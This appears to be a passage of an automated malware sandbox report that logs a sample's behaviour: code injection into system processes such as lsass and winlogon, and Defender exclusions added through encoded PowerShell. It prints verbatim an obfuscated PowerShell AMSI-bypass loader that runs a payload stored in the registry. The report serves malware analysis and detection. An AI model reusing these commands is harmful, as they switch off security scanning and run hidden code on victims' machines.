Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5547Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3401Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5587Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2582Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 989
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2928
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3963
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 581
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1048
Source: C:\Windows\System32\dllhost.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_39-6467
Source: C:\Windows\System32\lsass.exeAPI coverage: 3.2 %
Source: C:\Windows\System32\svchost.exeAPI coverage: 3.2 %
Source: C:\Windows\System32\svchost.exeAPI coverage: 3.2 %
Source: C:\Windows\System32\lsass.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\System32\svchost.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\Install.exeAPI call chain: ExitProcess graph end nodegraph_1-3376
Source: C:\Users\user\AppData\Roaming\34432.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\Install.exeCode function: 1_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,1_2_00405C49
Source: C:\Users\user\Desktop\Install.exeCode function: 1_2_00406873 FindFirstFileW,FindClose,1_2_00406873
Source: C:\Users\user\Desktop\Install.exeCode function: 1_2_0040290B FindFirstFileW,1_2_0040290B
Source: C:\Windows\System32\nslookup.exeCode function: 22_2_0000000140006E1C FindFirstFileExW,22_2_0000000140006E1C
Source: C:\Windows\System32\dllhost.exeCode function: 39_2_00000001400073C8 FindFirstFileExW,39_2_00000001400073C8
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDD0D0E4 FindFirstFileExW,42_2_000001AFDDD0D0E4
Source: C:\Windows\System32\lsass.exeCode function: 44_2_00000240B2BBD0E4 FindFirstFileExW,44_2_00000240B2BBD0E4
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001CAF3D0D0E4 FindFirstFileExW,47_2_000001CAF3D0D0E4
Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001B8BFF4D0E4 FindFirstFileExW,49_2_000001B8BFF4D0E4
Source: C:\Windows\System32\nslookup.exeCode function: 22_2_0000000140005D5C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_0000000140005D5C
Source: C:\Windows\System32\nslookup.exeCode function: 22_2_00000001400090E0 GetProcessHeap,22_2_00000001400090E0
Source: C:\Users\user\AppData\Roaming\34432.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\dllhost.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\34432.exeMemory allocated: page read and write | page guardJump to behavior
Source: C:\Windows\System32\nslookup.exeCode function: 22_2_00000001400021B8 SetUnhandledExceptionFilter,_invalid_parameter_noinfo,22_2_00000001400021B8
Source: C:\Windows\System32\nslookup.exeCode function: 22_2_0000000140002CF4 SetUnhandledExceptionFilter,22_2_0000000140002CF4
Source: C:\Windows\System32\nslookup.exeCode function: 22_2_0000000140005D5C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_0000000140005D5C
Source: C:\Windows\System32\nslookup.exeCode function: 22_2_0000000140002B10 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_0000000140002B10
Source: C:\Windows\System32\nslookup.exeCode function: 22_2_000000014000235C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,22_2_000000014000235C
Source: C:\Windows\System32\dllhost.exeCode function: 39_2_0000000140002338 SetUnhandledExceptionFilter,_invalid_parameter_noinfo,39_2_0000000140002338
Source: C:\Windows\System32\dllhost.exeCode function: 39_2_0000000140002C90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,39_2_0000000140002C90
Source: C:\Windows\System32\dllhost.exeCode function: 39_2_00000001400024DC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,39_2_00000001400024DC
Source: C:\Windows\System32\dllhost.exeCode function: 39_2_000000014000624C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,39_2_000000014000624C
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDD09098 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,42_2_000001AFDDD09098
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDD08450 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,42_2_000001AFDDD08450
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDD0BEC8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,42_2_000001AFDDD0BEC8
Source: C:\Windows\System32\lsass.exeCode function: 44_2_00000240B2BB8450 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,44_2_00000240B2BB8450
Source: C:\Windows\System32\lsass.exeCode function: 44_2_00000240B2BB9098 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,44_2_00000240B2BB9098
Source: C:\Windows\System32\lsass.exeCode function: 44_2_00000240B2BBBEC8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,44_2_00000240B2BBBEC8
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001CAF3D08450 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,47_2_000001CAF3D08450
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001CAF3D09098 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,47_2_000001CAF3D09098
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001CAF3D0BEC8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,47_2_000001CAF3D0BEC8
Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001B8BFF49098 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,49_2_000001B8BFF49098
Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001B8BFF48450 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,49_2_000001B8BFF48450
Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001B8BFF4BEC8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,49_2_000001B8BFF4BEC8

HIPS / PFW / Operating System Protection Evasion

barindex
Encrypted powershell cmdline option found
Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force
Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded Add-MpPreference -ExclusionExtension @('exe','dll') -Force
Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force
Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force
Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -ForceJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded Add-MpPreference -ExclusionExtension @('exe','dll') -ForceJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force
Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force
Allocates memory in foreign processes
Source: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exeMemory allocated: C:\Windows\System32\nslookup.exe base: 140000000 protect: page execute and read and writeJump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exeMemory written: C:\Windows\System32\nslookup.exe base: 140000000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 1AFDDCD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 240B2B80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1CAF3CD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B8BFF10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 2C633850000 value starts with: 4D5A
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\winlogon.exe EIP: DDCD35D0
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\lsass.exe EIP: B2B835D0
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: F3CD35D0
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: BFF135D0
Writes to foreign memory regions
Source: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 4CF1008Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exeMemory written: C:\Windows\System32\nslookup.exe base: 140000000Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exeMemory written: C:\Windows\System32\nslookup.exe base: 140001000Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exeMemory written: C:\Windows\System32\nslookup.exe base: 14000E000Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exeMemory written: C:\Windows\System32\nslookup.exe base: 140019000Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exeMemory written: C:\Windows\System32\nslookup.exe base: 14001B000Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exeMemory written: C:\Windows\System32\nslookup.exe base: 14001C000Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exeMemory written: C:\Windows\System32\nslookup.exe base: 14001D000Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exeMemory written: C:\Windows\System32\nslookup.exe base: 140056000Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exeMemory written: C:\Windows\System32\nslookup.exe base: 44EB131010Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140001000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 14000E000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140018000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 14001A000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 14001B000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 14001C000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 14003F000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: EE637B6010
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 1AFDDCD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 240B2B80000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1CAF3CD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B8BFF10000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 2C633850000
.NET source code references suspicious native API functions
Source: 34432.exe.1.dr, u200f????????????????????????????????????????.csReference to suspicious API methods: ('?????????????????????????????????????????', 'WriteProcessMemory@kernel32.dll'), ('?????????????????????????????????????????', 'VirtualAllocEx@kernel32.dll')
Source: 2.3.ChiefKeefofficialnaxyi_crypted(6).exe.2670000.0.unpack, u0003u2006.csReference to suspicious API methods: ('\\x02', 'LoadLibrary@kernel32.dll'), ('\\x02', 'GetProcAddress@kernel32.dll')
Source: chrome.exe.4.dr, u200f????????????????????????????????????????.csReference to suspicious API methods: ('?????????????????????????????????????????', 'WriteProcessMemory@kernel32.dll'), ('?????????????????????????????????????????', 'VirtualAllocEx@kernel32.dll')
Source: 5.2.AppLaunch.exe.400000.0.unpack, u0003u2006.csReference to suspicious API methods: ('\\x02', 'LoadLibrary@kernel32.dll'), ('\\x02', 'GetProcAddress@kernel32.dll')
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\AppData\Roaming\34432.exeThread register set: target process: 7056Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 2324
Source: C:\Users\user\AppData\Roaming\34432.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$qKHXRLjxcQb.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$hCPAJCDcAnFqJq).SetImplementationFlags('Runtime,Managed');$qKHXRLjxcQb.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$NibVxWxTFc,$hCPAJCDcAnFqJq).SetImplementationFlags('Runtime,Managed');Write-Output $qKHXRLjxcQb.CreateType();}$uYKrZWxknTiUv=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$SpNyfScDlNPPHB=$uYKrZWxknTiUv.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$RRmRtbQVOsCwqbtFCRP=oBYZxpoBuJDg @([String])([IntPtr]);$CSrLsWTvUKtnfJeCoYnQHQ=oBYZxpoBuJDg @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$LbwxtlPJWDL=$uYKrZWxknTiUv.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$UsbtvKZkuSsHuw=$SpNyfScDlNPPHB.Invoke($Null,@([Object]$LbwxtlPJWDL,[Object]('Load'+'LibraryA')));$GBWVSxTZRtiWMYLEL=$SpNyfScDlNPPHB.Invoke($Null,@([Object]$LbwxtlPJWDL,[Object]('Vir'+'tual'+'Pro'+'tect')));$zcmbglj=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UsbtvKZkuSsHuw,$RRmRtbQVOsCwqbtFCRP).Invoke('a'+'m'+'si.dll');$NtWqUAjxRFzIehWzj=$SpNyfScDlNPPHB.Invoke($Null,@([Object]$zcmbglj,[Object]('Ams'+'iSc'+'an'+'Buffer')));$QZnCEHiAlz=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GBWVSxTZRtiWMYLEL,$CSrLsWTvUKtnfJeCoYnQHQ).Invoke($NtWqUAjxRFzIehWzj,[uint32]8,4,[ref]$QZnCEHiAlz);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$NtWqUAjxRFzIehWzj,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GBWVSxTZRtiWMYLEL,$CSrLsWTvUKtnfJeCoYnQHQ).Invoke($NtWqUAjxRFzIehWzj,[uint32]8,0x20,[ref]$QZnCEHiAlz);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.Invoke($Null,$Null)"
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$JkETjFsAcrF.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$jwjRgZFzaeZBQB).SetImplementationFlags('Runtime,Managed');$JkETjFsAcrF.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$jXrdWylJno,$jwjRgZFzaeZBQB).SetImplementationFlags('Runtime,Managed');Write-Output $JkETjFsAcrF.CreateType();}$lPmVEIqLxWSBJ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$oknnqNPEawtCof=$lPmVEIqLxWSBJ.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$PfTqTVeTqNbzEtTZAwA=JcVEStQtPhkP @([String])([IntPtr]);$FBhryrsEcCEQMAYVVFmrjj=JcVEStQtPhkP @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$gdWNaSIjpXI=$lPmVEIqLxWSBJ.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$MwCkRVFOfjwTFV=$oknnqNPEawtCof.Invoke($Null,@([Object]$gdWNaSIjpXI,[Object]('Load'+'LibraryA')));$PwfBMMcphOddVTLUY=$oknnqNPEawtCof.Invoke($Null,@([Object]$gdWNaSIjpXI,[Object]('Vir'+'tual'+'Pro'+'tect')));$FyAgKxj=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MwCkRVFOfjwTFV,$PfTqTVeTqNbzEtTZAwA).Invoke('a'+'m'+'si.dll');$GiLFGjttEZsjytHxc=$oknnqNPEawtCof.Invoke($Null,@([Object]$FyAgKxj,[Object]('Ams'+'iSc'+'an'+'Buffer')));$XarcXAurwd=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PwfBMMcphOddVTLUY,$FBhryrsEcCEQMAYVVFmrjj).Invoke($GiLFGjttEZsjytHxc,[uint32]8,4,[ref]$XarcXAurwd);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$GiLFGjttEZsjytHxc,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PwfBMMcphOddVTLUY,$FBhryrsEcCEQMAYVVFmrjj).Invoke($GiLFGjttEZsjytHxc,[uint32]8,0x20,[ref]$XarcXAurwd);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.Invoke($Null,$Null)"
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
Source: C:\Users\user\AppData\Roaming\34432.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exitJump to behavior
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
